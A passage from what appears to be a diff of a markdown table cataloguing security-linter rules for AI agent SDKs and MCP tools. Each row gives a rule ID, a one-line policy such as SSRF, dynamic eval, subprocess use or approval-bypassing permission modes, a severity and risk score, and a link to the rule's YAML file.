caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [mcp/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/ssrf.yaml) | -| 102 | MCP-014 | MCP | tool | mcp_tool | TypeScript MCP tool evaluates dynamic code | high | 0.90 | 63.0 | [mcp/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/code_execution.yaml) | -| 103 | LC-001 | LangChain | tool | langchain_tool | LangChain tool has no description | low | 0.80 | 12.0 | [langchain/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_definition.yaml) | -| 104 | LC-002 | LangChain | tool | langchain_tool | LangChain tool parameters are not type-annotated | medium | 0.85 | 34.0 | [langchain/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_definition.yaml) | -| 105 | LC-003 | LangChain | tool | langchain_tool | LangChain tool body spawns a subprocess | high | 0.85 | 59.5 | [langchain/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/shell_safety.yaml) | -| 106 | LC-004 | LangChain | tool | langchain_tool | LangChain tool body evaluates dynamic code | high | 0.85 | 59.5 | [langchain/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/code_execution.yaml) | -| 107 | LC-005 | LangChain | tool | langchain_tool | LangChain tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [langchain/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/ssrf.yaml) | -| 108 | LC-006 | LangChain | tool | langchain_tool | LangChain tool returns its output directly, bypassing the model | medium | 0.80 | 32.0 | [langchain/tool_behavior.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_behavior.yaml) | -| 109 | LC-010 | LangChain | tool | langchain_tool | TypeScript LangChain tool has no description | low | 0.80 | 12.0 | [langchain/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_definition.yaml) | -| 110 | LC-011 | LangChain | tool | langchain_tool | TypeScript LangChain tool body spawns a subprocess | high | 0.85 | 59.5 | [langchain/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/shell_safety.yaml) | -| 111 | LC-012 | LangChain | tool | langchain_tool | TypeScript LangChain tool evaluates dynamic code | high | 0.85 | 59.5 | [langchain/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/code_execution.yaml) | -| 112 | LC-013 | LangChain | tool | langchain_tool | TypeScript LangChain tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [langchain/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/ssrf.yaml) | -| 113 | LC-014 | LangChain | tool | langchain_tool | TypeScript LangChain tool returns its output directly, bypassing the model | medium | 0.80 | 32.0 | [langchain/tool_behavior.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_behavior.yaml) | -| 114 | LC-101 | LangChain | agent | langchain_agent, langchain_agent_executor | LangChain agent wires a code-execution or shell built-in tool | high | 0.85 | 59.5 | [langchain/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/agent_safety.yaml) | -| 115 | LC-102 | LangChain | agent | langchain_agent_executor | LangChain AgentExecutor has no max_iterations limit | medium | 0.80 | 32.0 | [langchain/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/agent_safety.yaml) | -| 116 | LC-111 | LangChain | agent | langchain_agent_executor | TypeScript LangChain AgentExecutor has no maxIterations limit | medium | 0.80 | 32.0 | [langchain/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/agent_safety.yaml) | -| 117 | LC-201 | LangChain | repo | langchain | LangChain project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [langchain/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/repo_hygiene.yaml) | +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| --- | -------- | ----------- | -------- | --------------------------------------------------- | ------------------------------------------------------------------------------------- | -------- | ---------- | ---- | ------------------------------------------------------------------------------------------------------------------------- | +| 1 | CSDK-001 | Claude SDK | tool | claude_sdk_tool | Tool has no description | low | 0.95 | 14.3 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 2 | CSDK-002 | Claude SDK | tool | claude_sdk_tool | Tool parameters are not type-annotated | medium | 0.90 | 36.0 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 3 | CSDK-003 | Claude SDK | tool | claude_sdk_tool | Network call has no timeout | high | 0.85 | 59.5 | [claude_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/network.yaml) | +| 4 | CSDK-004 | Claude SDK | tool | claude_sdk_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | [claude_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | +| 5 | CSDK-005 | Claude SDK | tool | claude_sdk_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [claude_sdk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/error_handling.yaml) | +| 6 | CSDK-006 | Claude SDK | tool | claude_sdk_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [claude_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | +| 7 | CSDK-007 | Claude SDK | tool | claude_sdk_tool | Ambiguous tool name | low | 0.90 | 13.5 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 8 | CSDK-008 | Claude SDK | tool | claude_sdk_tool | Tool exposes **kwargs without explicit input_schema | medium | 0.80 | 32.0 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 9 | CSDK-009 | Claude SDK | tool | claude_sdk_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [claude_sdk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | +| 10 | CSDK-010 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool shells out to the OS | high | 0.70 | 49.0 | [claude_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | +| 11 | CSDK-011 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool evaluates dynamic code | high | 0.90 | 63.0 | [claude_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | +| 12 | CSDK-012 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool writes to the filesystem | medium | 0.50 | 20.0 | [claude_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | +| 13 | CSDK-013 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [claude_sdk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | +| 14 | CSDK-014 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool has no description | low | 0.90 | 13.5 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 15 | CSDK-016 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK mutating tool has no idempotency key | medium | 0.50 | 20.0 | [claude_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | +| 16 | CSDK-101 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the Bash tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 17 | CSDK-102 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebSearch tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 18 | CSDK-103 | Claude SDK | agent | claude_agent_definition | AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 19 | CSDK-104 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted filesystem-write built-ins | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 20 | CSDK-105 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebFetch tool | high | 0.75 | 52.5 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 21 | CSDK-107 | Claude SDK | tool | claude_sdk_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [claude_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | +| 22 | CSDK-108 | Claude SDK | tool | claude_sdk_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [claude_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | +| 23 | CSDK-110 | Claude SDK | subagent | claude_subagent | Subagent granted the built-in Bash tool | high | 0.90 | 63.0 | [claude_sdk/subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | +| 24 | CSDK-111 | Claude SDK | subagent | claude_subagent | Subagent granted filesystem-write or web-fetch built-ins | high | 0.85 | 59.5 | [claude_sdk/subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | +| 25 | CSDK-120 | Claude SDK | agent | claude_agent_definition | TypeScript AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 26 | CSDK-130 | Claude SDK | agent | claude_query_main | TypeScript query() main agent is granted the Bash tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 27 | CSDK-131 | Claude SDK | agent | claude_query_main | TypeScript query() main agent is granted filesystem-write or web-fetch built-ins | high | 0.75 | 52.5 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 28 | CSDK-201 | Claude SDK | repo | claude_sdk | Project default permission mode bypasses approvals | high | 0.90 | 63.0 | [claude_sdk/repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | +| 29 | CSDK-202 | Claude SDK | repo | claude_sdk | Session permission mode bypasses approvals | high | 0.90 | 63.0 | [claude_sdk/repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | +| 30 | CSDK-203 | Claude SDK | repo | claude_sdk | Repo ships Claude Agent SDK code without an agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [claude_sdk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo_hygiene.yaml) | +| 31 | OAI-001 | OpenAI SDK | tool | openai_tool | Tool function has no docstring | low | 0.90 | 13.5 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 32 | OAI-002 | OpenAI SDK | tool | openai_tool | Tool function has no type-annotated parameters | medium | 0.85 | 34.0 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 33 | OAI-003 | OpenAI SDK | tool | openai_tool | Tool sets strict_mode=False | medium | 0.95 | 38.0 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | +| 34 | OAI-004 | OpenAI SDK | tool | openai_tool | Tool has no failure_error_function | medium | 0.70 | 28.0 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | +| 35 | OAI-005 | OpenAI SDK | tool | openai_tool | Network call has no timeout | high | 0.85 | 59.5 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 36 | OAI-006 | OpenAI SDK | tool | openai_tool | Tool accepts path without normalization | high | 0.70 | 49.0 | [openai_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/path_safety.yaml) | +| 37 | OAI-007 | OpenAI SDK | tool | openai_tool | Ambiguous tool name | low | 0.90 | 13.5 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 38 | OAI-008 | OpenAI SDK | tool | openai_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [openai_sdk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/error_handling.yaml) | +| 39 | OAI-009 | OpenAI SDK | tool | openai_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [openai_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | +| 40 | OAI-010 | OpenAI SDK | tool | openai_tool | Tool function prints to stdout for diagnostics | low | 0.65 | 9.8 | [openai_sdk/observability.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/observability.yaml) | +| 41 | OAI-011 | OpenAI SDK | tool | openai_tool | urllib network call has no timeout | high | 0.85 | 59.5 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 42 | OAI-012 | OpenAI SDK | tool | openai_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [openai_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/shell_safety.yaml) | +| 43 | OAI-013 | OpenAI SDK | tool | openai_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [openai_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | +| 44 | OAI-014 | OpenAI SDK | tool | openai_tool | Privileged tool has no needs_approval gate | high | 0.70 | 49.0 | [openai_sdk/approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | +| 45 | OAI-015 | OpenAI SDK | tool | openai_tool | Tool sets failure_error_function=None | high | 0.85 | 59.5 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | +| 46 | OAI-016 | OpenAI SDK | tool | openai_tool | TypeScript tool fetch call has no AbortSignal timeout | high | 0.60 | 42.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 47 | OAI-017 | OpenAI SDK | tool | openai_tool | TypeScript tool body calls eval / new Function on dynamic input | high | 0.90 | 63.0 | [openai_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | +| 48 | OAI-018 | OpenAI SDK | tool | openai_tool | Tool builds outbound URL from non-literal value | medium | 0.55 | 22.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 49 | OAI-019 | OpenAI SDK | tool | openai_tool | TypeScript mutating tool has no idempotency key | medium | 0.50 | 20.0 | [openai_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | +| 50 | OAI-022 | OpenAI SDK | tool | openai_tool | TypeScript tool has no description | low | 0.85 | 12.8 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 51 | OAI-024 | OpenAI SDK | tool | openai_tool | TypeScript tool builds outbound URL from a non-literal value | medium | 0.60 | 24.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 52 | OAI-101 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent has no input_guardrails AND wires shell or filesystem-touching tools | high | 0.85 | 59.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 53 | OAI-102 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses tool_use_behavior="stop_on_first_tool" | high | 0.95 | 66.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 54 | OAI-103 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | tool_choice="required" combined with reset_tool_choice=False | high | 0.95 | 66.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 55 | OAI-104 | OpenAI SDK | agent | openai_agent | Raw Agent (not SandboxAgent) wires shell or filesystem-touching tools | medium | 0.75 | 30.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 56 | OAI-105 | OpenAI SDK | agent | openai_agent | TypeScript agent wires a content-fetching hosted tool without inputGuardrails | high | 0.80 | 56.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 57 | OAI-106 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires MCP servers without input_guardrails | high | 0.90 | 63.0 | [openai_sdk/mcp_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/mcp_safety.yaml) | +| 58 | OAI-109 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses WebSearchTool without input_guardrails | high | 0.85 | 59.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 59 | OAI-110 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a content-fetching tool without output_guardrails | high | 0.60 | 42.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 60 | OAI-111 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a privileged hosted tool without needs_approval | high | 0.75 | 52.5 | [openai_sdk/approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | +| 61 | OAI-201 | OpenAI SDK | repo | openai_agents | Project uses default OpenAI tracing | medium | 0.80 | 32.0 | [openai_sdk/tracing.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tracing.yaml) | +| 62 | OAI-202 | OpenAI SDK | repo | openai_agents | OpenAI Agents project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [openai_sdk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/repo_hygiene.yaml) | +| 63 | ADK-001 | Google ADK | tool | adk_function_tool | FunctionTool-wrapped function has no docstring | low | 0.80 | 12.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 64 | ADK-002 | Google ADK | tool | adk_function_tool | FunctionTool-wrapped function has no type-annotated parameters | medium | 0.85 | 34.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 65 | ADK-003 | Google ADK | tool | adk_function_tool | Network call has no timeout | high | 0.85 | 59.5 | [google_adk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/network.yaml) | +| 66 | ADK-004 | Google ADK | tool | adk_function_tool | Path parameter used in I/O without normalization | high | 0.70 | 49.0 | [google_adk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/path_safety.yaml) | +| 67 | ADK-005 | Google ADK | tool | adk_function_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [google_adk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/error_handling.yaml) | +| 68 | ADK-006 | Google ADK | tool | adk_function_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [google_adk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/idempotency.yaml) | +| 69 | ADK-007 | Google ADK | tool | adk_function_tool | Ambiguous tool name | low | 0.90 | 13.5 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 70 | ADK-008 | Google ADK | agent | adk_llm_agent | Agent grants BashTool with no restrictive command policy | high | 0.75 | 52.5 | [google_adk/builtin_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/builtin_tools.yaml) | +| 71 | ADK-009 | Google ADK | tool | adk_function_tool | FunctionTool body prints to stdout | low | 0.70 | 10.5 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 72 | ADK-010 | Google ADK | tool | adk_function_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [google_adk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/shell_safety.yaml) | +| 73 | ADK-011 | Google ADK | tool | adk_function_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [google_adk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | +| 74 | ADK-012 | Google ADK | tool | adk_function_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [google_adk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | +| 75 | ADK-013 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool has no description | low | 0.80 | 12.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 76 | ADK-015 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool body evaluates dynamic code | high | 0.90 | 63.0 | [google_adk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | +| 77 | ADK-016 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [google_adk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | +| 78 | ADK-101 | Google ADK | agent | adk_llm_agent | LlmAgent has no description | medium | 0.85 | 34.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 79 | ADK-102 | Google ADK | agent | adk_llm_agent | Agent with BashTool has no before_tool_callback | high | 0.85 | 59.5 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 80 | ADK-103 | Google ADK | agent | adk_llm_agent | Sub-agent is granted BashTool | high | 0.90 | 63.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 81 | ADK-104 | Google ADK | agent | adk_llm_agent | Agent has no safety_settings | medium | 0.75 | 30.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 82 | ADK-105 | Google ADK | agent | adk_llm_agent | Agent uses web search built-in without before_tool_callback | high | 0.85 | 59.5 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 83 | ADK-106 | Google ADK | agent | adk_llm_agent | Agent has a code_executor but no before_model_callback | high | 0.80 | 56.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 84 | ADK-107 | Google ADK | agent | adk_llm_agent | Agent grants AgentTool but has no before_tool_callback | high | 0.70 | 49.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 85 | ADK-108 | Google ADK | agent | adk_loop_agent | LoopAgent has no max_iterations | medium | 0.70 | 28.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 86 | ADK-109 | Google ADK | agent | adk_llm_agent | TypeScript LlmAgent has no description | medium | 0.85 | 34.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 87 | ADK-110 | Google ADK | agent | adk_llm_agent | Agent fetches web content via UrlContextTool/LoadWebPage without before_tool_callback | medium | 0.70 | 28.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 88 | ADK-201 | Google ADK | repo | google_adk | Google ADK project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [google_adk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/repo_hygiene.yaml) | +| 89 | MCP-001 | MCP | tool | mcp_tool | Tool has no description | low | 0.90 | 13.5 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 90 | MCP-002 | MCP | tool | mcp_tool | Tool has no type-annotated parameters | medium | 0.85 | 34.0 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 91 | MCP-003 | MCP | tool | mcp_tool | Ambiguous tool name | low | 0.85 | 12.8 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 92 | MCP-004 | MCP | tool | mcp_tool | Network call has no timeout | high | 0.85 | 59.5 | [mcp/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/network.yaml) | +| 93 | MCP-005 | MCP | tool | mcp_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | [mcp/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/path_safety.yaml) | +| 94 | MCP-006 | MCP | tool | mcp_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [mcp/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/error_handling.yaml) | +| 95 | MCP-007 | MCP | tool | mcp_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [mcp/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/idempotency.yaml) | +| 96 | MCP-008 | MCP | tool | mcp_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [mcp/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/ssrf.yaml) | +| 97 | MCP-009 | MCP | tool | mcp_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [mcp/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/code_execution.yaml) | +| 98 | MCP-010 | MCP | tool | mcp_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [mcp/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/shell_safety.yaml) | +| 99 | MCP-011 | MCP | tool | mcp_tool | TypeScript MCP tool has no description | low | 0.85 | 12.8 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 100 | MCP-012 | MCP | tool | mcp_tool | TypeScript MCP tool spawns a subprocess | high | 0.70 | 49.0 | [mcp/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/shell_safety.yaml) | +| 101 | MCP-013 | MCP | tool | mcp_tool | TypeScript MCP tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [mcp/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/ssrf.yaml) | +| 102 | MCP-014 | MCP | tool | mcp_tool | TypeScript MCP tool evaluates dynamic code | high | 0.90 | 63.0 | [mcp/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/code_execution.yaml) | +| 103 | LC-001 | LangChain | tool | langchain_tool | LangChain tool has no description | low | 0.80 | 12.0 | [langchain/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_definition.yaml) | +| 104 | LC-002 | LangChain | tool | langchain_tool | LangChain tool parameters are not type-annotated | medium | 0.85 | 34.0 | [langchain/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_definition.yaml) | +| 105 | LC-003 | LangChain | tool | langchain_tool | LangChain tool body spawns a subprocess | high | 0.85 | 59.5 | [langchain/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/shell_safety.yaml) | +| 106 | LC-004 | LangChain | tool | langchain_tool | LangChain tool body evaluates dynamic code | high | 0.85 | 59.5 | [langchain/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/code_execution.yaml) | +| 107 | LC-005 | LangChain | tool | langchain_tool | LangChain tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [langchain/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/ssrf.yaml) | +| 108 | 